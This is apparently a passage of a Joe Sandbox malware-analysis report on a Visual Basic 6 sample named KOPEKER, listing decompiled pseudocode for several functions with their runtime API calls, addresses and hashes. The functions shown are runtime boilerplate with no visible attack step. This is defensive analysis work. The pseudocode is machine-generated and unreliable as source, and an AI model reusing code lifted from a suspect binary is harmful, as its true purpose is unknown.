				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x50,  *[fs:0x0], 0x4016f6, _t68);
				if(0 != 0) {
					_t58 =  *((intOrPtr*)( *_a4 + 0x254))(_a4, 0xb);
					asm("fclex");
					_v80 = _t58;
					if(_v80 >= 0) {
						_v96 = _v96 & 0x00000000;
					} else {
						_push(0x254);
						_push(0x4105b8);
						_push(_a4);
						_push(_v80);
						L00401906();
						_v96 = _t58;
					}
				}
				_v60 = 1;
				_t48 =  &_v60;
				_push(_t48);
				L00401864();
				_v80 =  ~(0 | _t48 != 0x0000ffff);
				L00401912();
				_t49 = _v80;
				if(_t49 != 0) {
					if( *0x4183d8 != 0) {
						_v100 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v100 = 0x4183d8;
					}
					_v80 =  *_v100;
					_t52 =  &_v40;
					L004018B8();
					_t53 =  &_v44;
					L004018BE();
					_t49 =  *((intOrPtr*)( *_v80 + 0x10))(_v80, _t53, _t53, _t52, _t52);
					asm("fclex");
					_v84 = _t49;
					if(_v84 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x10);
						_push(0x411ad0);
						_push(_v80);
						_push(_v84);
						L00401906();
						_v104 = _t49;
					}
					L004018AC();
				}
				_push(0x414bc6);
				L00401912();
				return _t49;
			}






















          0x00414a7d
          0x00414a8c
          0x00414a96
          0x00414a9e
          0x00414aa1
          0x00414aa8
          0x00414ab7
          0x00414abe
          0x00414aca
          0x00414ad0
          0x00414ad2
          0x00414ad9
          0x00414af5
          0x00414adb
          0x00414adb
          0x00414ae0
          0x00414ae5
          0x00414ae8
          0x00414aeb
          0x00414af0
          0x00414af0
          0x00414ad9
          0x00414af9
          0x00414b00
          0x00414b03
          0x00414b04
          0x00414b14
          0x00414b1b
          0x00414b20
          0x00414b26
          0x00414b2f
          0x00414b49
          0x00414b31
          0x00414b31
          0x00414b36
          0x00414b3b
          0x00414b40
          0x00414b40
          0x00414b55
          0x00414b58
          0x00414b5c
          0x00414b62
          0x00414b66
          0x00414b74
          0x00414b77
          0x00414b79
          0x00414b80
          0x00414b99
          0x00414b82
          0x00414b82
          0x00414b84
          0x00414b89
          0x00414b8c
          0x00414b8f
          0x00414b94
          0x00414b94
          0x00414ba0
          0x00414ba0
          0x00414ba5
          0x00414bc0
          0x00414bc5

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414A96
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401488,004105B8,00000254), ref: 00414AEB
          • #560.MSVBVM60(00000001), ref: 00414B04
          • __vbaFreeVar.MSVBVM60(00000001), ref: 00414B1B
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00000001), ref: 00414B3B
          • __vbaObjVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000001), ref: 00414B5C
          • __vbaObjSetAddref.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00414B66
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000010,?,?,?,?,?,?,?,?,?,00000001), ref: 00414B8F
          • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,00000001), ref: 00414BA0
          • __vbaFreeVar.MSVBVM60(00414BC6,00000001), ref: 00414BC0
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$Free$CheckHresult$#560AddrefChkstkNew2
          • String ID:
          • API String ID: 70940770-0
          • Opcode ID: b5cdb1583836136bc9da7fd9703093bab2fff25e5d4cf5cd08accfd2c2e6b946
          • Instruction ID: d64d553ebe0e64b1310e3a2d10564cc268948e687aa3ee09596a465f374d7255
          • Opcode Fuzzy Hash: b5cdb1583836136bc9da7fd9703093bab2fff25e5d4cf5cd08accfd2c2e6b946
          • Instruction Fuzzy Hash: 77314770D00208AFDB00EFA1C849BDEBBB4BF04745F10842AF515BB2A1D7B9A985DF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00416BB6, Relevance: 13.6, APIs: 9, Instructions: 71COMMON
          Download Yara Rule
          C-Code - Quality: 60%
          			E00416BB6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v40;
				signed int _v52;
				signed int _t27;
				signed int _t31;
				void* _t40;
				void* _t42;
				intOrPtr _t43;

				_t43 = _t42 - 0xc;
				 *[fs:0x0] = _t43;
				L004016F0();
				_v16 = _t43;
				_v12 = 0x401668;
				_v8 = 0;
				_t27 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x4016f6, _t40);
				_push(1);
				L004017A4();
				L00401882();
				_push(_t27);
				_push(0x411e98);
				L0040184C();
				asm("sbb eax, eax");
				_v40 =  ~( ~( ~_t27));
				L00401924();
				_t31 = _v40;
				if(_t31 == 0) {
					L004017C8();
					L0040193C();
					asm("fcomp qword [0x401548]");
					asm("fnstsw ax");
					asm("sahf");
					if(__eflags != 0) {
						L0040183A();
						_t31 =  *((intOrPtr*)( *_a4 + 0x64))(_a4, _t31);
						asm("fclex");
						_v40 = _t31;
						__eflags = _v40;
						if(_v40 >= 0) {
							_t19 =  &_v52;
							 *_t19 = _v52 & 0x00000000;
							__eflags =  *_t19;
						} else {
							_push(0x64);
							_push(0x4105b8);
							_push(_a4);
							_push(_v40);
							L00401906();
							_v52 = _t31;
						}
					}
					_v32 = 0x562c6b10;
					_v28 = 0x5afc;
				}
				asm("wait");
				_push(0x416ca8);
				return _t31;
			}
















          0x00416bb9
          0x00416bc8
          0x00416bd2
          0x00416bda
          0x00416bdd
          0x00416be4
          0x00416bf3
          0x00416bf6
          0x00416bf8
          0x00416c02
          0x00416c07
          0x00416c08
          0x00416c0d
          0x00416c14
          0x00416c1a
          0x00416c21
          0x00416c26
          0x00416c2c
          0x00416c36
          0x00416c3b
          0x00416c40
          0x00416c46
          0x00416c48
          0x00416c49
          0x00416c51
          0x00416c5f
          0x00416c62
          0x00416c64
          0x00416c67
          0x00416c6b
          0x00416c84
          0x00416c84
          0x00416c84
          0x00416c6d
          0x00416c6d
          0x00416c6f
          0x00416c74
          0x00416c77
          0x00416c7a
          0x00416c7f
          0x00416c7f
          0x00416c6b
          0x00416c88
          0x00416c8f
          0x00416c8f
          0x00416c96
          0x00416c97
          0x00000000

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00416BD2
          • #525.MSVBVM60(00000001,?,?,?,?,004016F6), ref: 00416BF8
          • __vbaStrMove.MSVBVM60(00000001,?,?,?,?,004016F6), ref: 00416C02
          • __vbaStrCmp.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C0D
          • __vbaFreeStr.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C21
          • __vbaFPInt.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C36
          • __vbaFpR8.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C3B
          • __vbaFpI4.MSVBVM60(00411E98,00000000,00000001,?,?,?,?,004016F6), ref: 00416C51
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401668,004105B8,00000064), ref: 00416C7A
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$#525CheckChkstkFreeHresultMove
          • String ID:
          • API String ID: 4043493740-0
          • Opcode ID: e168a4e3d694ae6a5a74697a6331568a2e76ef4fee398450861547adb4abc302
          • Instruction ID: 86a1e89719f635477d496dccceb2a89c5ea790decd70b889dceaef3fae3058f2
          • Opcode Fuzzy Hash: e168a4e3d694ae6a5a74697a6331568a2e76ef4fee398450861547adb4abc302
          • Instruction Fuzzy Hash: 96215975940208EBDB10AFA5CD05BEE7BB4FF04B44F10816AF445BB1B1DB798A80CB99
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004163D6, Relevance: 10.6, APIs: 7, Instructions: 84COMMON
          Download Yara Rule
          C-Code - Quality: 65%
          			E004163D6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v56;
				signed int _v60;
				intOrPtr _v72;
				intOrPtr* _v76;
				signed int _v80;
				signed int _v84;
				signed int _t55;
				signed int _t60;
				signed int _t61;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t72 = _t71 - 0xc;
				 *[fs:0x0] = _t72;
				L004016F0();
				_v16 = _t72;
				_v12 = 0x4015d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x3c,  *[fs:0x0], 0x4016f6, _t69);
				if( *0x4183d8 != 0) {
					_v76 = 0x4183d8;
				} else {
					_push(0x4183d8);
					_push(0x411ae0);
					L004018C4();
					_v76 = 0x4183d8;
				}
				_v48 =  *_v76;
				_t55 =  *((intOrPtr*)( *_v48 + 0x14))(_v48,  &_v44);
				asm("fclex");
				_v52 = _t55;
				if(_v52 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x14);
					_push(0x411ad0);
					_push(_v48);
					_push(_v52);
					L00401906();
					_v80 = _t55;
				}
				_v56 = _v44;
				_t60 =  *((intOrPtr*)( *_v56 + 0xe8))(_v56,  &_v40);
				asm("fclex");
				_v60 = _t60;
				if(_v60 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x411c4c);
					_push(_v56);
					_push(_v60);
					L00401906();
					_v84 = _t60;
				}
				_t61 = _v40;
				_v72 = _t61;
				_v40 = _v40 & 0x00000000;
				L00401882();
				L004018AC();
				_v36 = 0xe5db1d70;
				_v32 = 0x5b00;
				_push(0x416508);
				L00401924();
				return _t61;
			}

























          0x004163d9
          0x004163e8
          0x004163f2
          0x004163fa
          0x004163fd
          0x00416404
          0x00416413
          0x0041641d
          0x00416437
          0x0041641f
          0x0041641f
          0x00416424
          0x00416429
          0x0041642e
          0x0041642e
          0x00416443
          0x00416452
          0x00416455
          0x00416457
          0x0041645e
          0x00416477
          0x00416460
          0x00416460
          0x00416462
          0x00416467
          0x0041646a
          0x0041646d
          0x00416472
          0x00416472
          0x0041647e
          0x0041648d
          0x00416493
          0x00416495
          0x0041649c
          0x004164b8
          0x0041649e
          0x0041649e
          0x004164a3
          0x004164a8
          0x004164ab
          0x004164ae
          0x004164b3
          0x004164b3
          0x004164bc
          0x004164bf
          0x004164c2
          0x004164cc
          0x004164d4
          0x004164d9
          0x004164e0
          0x004164e7
          0x00416502
          0x00416507

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 004163F2
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,?,?,?,?,004016F6), ref: 00416429
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000014), ref: 0041646D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411C4C,000000E8), ref: 004164AE
          • __vbaStrMove.MSVBVM60 ref: 004164CC
          • __vbaFreeObj.MSVBVM60 ref: 004164D4
          • __vbaFreeStr.MSVBVM60(00416508), ref: 00416502
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$CheckFreeHresult$ChkstkMoveNew2
          • String ID:
          • API String ID: 1253681662-0
          • Opcode ID: 6a38498e2cdce9228928d372c4e3d1505c7f6e7014a28709a69597d88b086051
          • Instruction ID: 185fc35ca0c0ee550ae393e7fd8e4a4c2d830685d3b22869f7f176cff8b22cf3
          • Opcode Fuzzy Hash: 6a38498e2cdce9228928d372c4e3d1505c7f6e7014a28709a69597d88b086051
          • Instruction Fuzzy Hash: 9231E170D40208AFCB00EF95C985BDEBBB5AF08745F60842AE505B62A0D7B9A985DF58
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00414BE5, Relevance: 10.6, APIs: 7, Instructions: 72COMMON
          Download Yara Rule
          C-Code - Quality: 56%
          			E00414BE5(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				void* _v28;
				long long _v36;
				signed int _v40;
				char* _v48;
				char _v56;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char* _t34;
				char* _t35;
				signed int _t41;
				intOrPtr _t52;

				_push(0x4016f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_push(0x3c);
				L004016F0();
				_v12 = _t52;
				_v8 = 0x4014a0;
				_v48 =  &_v24;
				_v56 = 0x6003;
				_t34 =  &_v56;
				_push(_t34);
				L0040185E();
				if(_t34 != 0xffff) {
					if( *0x4183d8 != 0) {
						_v76 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v76 = 0x4183d8;
					}
					_v60 =  *_v76;
					_t41 =  *((intOrPtr*)( *_v60 + 0x48))(_v60, 0x20,  &_v40);
					asm("fclex");
					_v64 = _t41;
					if(_v64 >= 0) {
						_v80 = _v80 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x411ad0);
						_push(_v60);
						_push(_v64);
						L00401906();
						_v80 = _t41;
					}
					_v72 = _v40;
					_v40 = _v40 & 0x00000000;
					L00401882();
				}
				_v36 =  *0x401498;
				asm("wait");
				_push(0x414cd8);
				_t35 =  &_v24;
				_push(_t35);
				_push(0);
				L00401858();
				L00401924();
				return _t35;
			}




















          0x00414bea
          0x00414bf5
          0x00414bf6
          0x00414bfd
          0x00414c00
          0x00414c08
          0x00414c0b
          0x00414c15
          0x00414c18
          0x00414c1f
          0x00414c22
          0x00414c23
          0x00414c2c
          0x00414c35
          0x00414c4f
          0x00414c37
          0x00414c37
          0x00414c3c
          0x00414c41
          0x00414c46
          0x00414c46
          0x00414c5b
          0x00414c6c
          0x00414c6f
          0x00414c71
          0x00414c78
          0x00414c91
          0x00414c7a
          0x00414c7a
          0x00414c7c
          0x00414c81
          0x00414c84
          0x00414c87
          0x00414c8c
          0x00414c8c
          0x00414c98
          0x00414c9b
          0x00414ca5
          0x00414ca5
          0x00414cb0
          0x00414cb3
          0x00414cb4
          0x00414cc4
          0x00414cc7
          0x00414cc8
          0x00414cca
          0x00414cd2
          0x00414cd7

          APIs
          • __vbaChkstk.MSVBVM60(?,004016F6), ref: 00414C00
          • #556.MSVBVM60(00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414C23
          • __vbaNew2.MSVBVM60(00411AE0,004183D8,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414C41
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411AD0,00000048,?,?,?,?,00006003), ref: 00414C87
          • __vbaStrMove.MSVBVM60(?,?,?,?,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414CA5
          • __vbaAryDestruct.MSVBVM60(00000000,?,00414CD8,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414CCA
          • __vbaFreeStr.MSVBVM60(00000000,?,00414CD8,00006003,?,?,?,?,?,?,?,?,?,?,004016F6), ref: 00414CD2
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: __vba$#556CheckChkstkDestructFreeHresultMoveNew2
          • String ID:
          • API String ID: 4055419735-0
          • Opcode ID: 30a5a9b54745f6a6728f28e7073e93b5fedf661ae7d45dcf0deff7015f264ccf
          • Instruction ID: 09988e479d3f168dbd1b2dad8c2f4f4398aa50f9cc29315291caccb5a7fa52d0
          • Opcode Fuzzy Hash: 30a5a9b54745f6a6728f28e7073e93b5fedf661ae7d45dcf0deff7015f264ccf
          • Instruction Fuzzy Hash: A9215970D41209AFDB00EF95D945BEEBBB4EF04704F20402AF104B62A0E7B96985CB59
          Uniqueness

          Uniqueness Score: -1.00%